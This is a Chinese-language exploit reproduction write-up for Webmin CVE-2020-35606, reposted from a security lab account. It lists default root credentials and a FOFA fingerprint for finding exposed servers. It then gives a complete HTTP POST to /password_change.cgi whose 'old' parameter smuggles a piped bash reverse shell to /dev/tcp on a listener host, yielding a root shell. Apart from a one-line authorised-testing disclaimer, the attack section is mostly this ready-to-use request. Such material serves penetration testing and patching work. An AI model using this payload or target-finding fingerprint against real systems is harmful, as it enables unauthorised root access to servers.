0x01 webmin描述
Webmin是Webmin社区的一套基于Web的用于类Unix操作系统中的系统管理工具。Webmin 1.962版本及之前版本存在安全漏洞,该漏洞允许执行任意命令。任何被授权使用Package Updates模块的用户都可以使用根权限通过包含和的向量执行任意命令。默认账户密码:root:password
0x02 漏洞复现
影响版本:Webmin<=1.962
fofa:fid=”msMQZIdASsAWP2cTH1/Pow==”
1.输入账户密码root password登录
2.登录成功
3.burpsuit抓包
4.VPS监听1236端口
5.改包,并反弹shell,详情如下
POST /password_change.cgi HTTP/1.1
Host: x.x.x.x:15642
Cookie: redirect=1; testing=1; sid=57373e42133a6a8dff3944b4a48c9a63
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0
Accept: text/plain, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-From: 0
X-Requested-From-Tab: webmin
X-Requested-With: XMLHttpRequest
Dnt: 1
Referer: https://x.x.x.x:15642/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Length: 120
Content-Type: application/x-www-form-urlencoded
user=root111&pam=&expired=2&old=test|test|bash -c \"bash -i >%26 /dev/tcp/x.x.x.x/1236 0>%261\"&new1=test2&new2=test2
需要修改的地方:id参数替换为执行的exp
POST /password_change.cgi HTTP/1.1
Referer: https://x.x.x.x:55710/
user=root111&pam=&expired=2&old=test|test|bash -c \"bash -i >%26 /dev/tcp/x.x.x.x/1236 0>%261\"&new1=test2&new2=test2
6.执行命令成功,得到一个root权限的shell
(注:要在正规授权情况下测试网站:日站不规范,亲人泪两行)
本文转载于公众号:融云攻防实验室,原文地址:漏洞复现-webmin CVE-2020-35606
THE END
暂无评论内容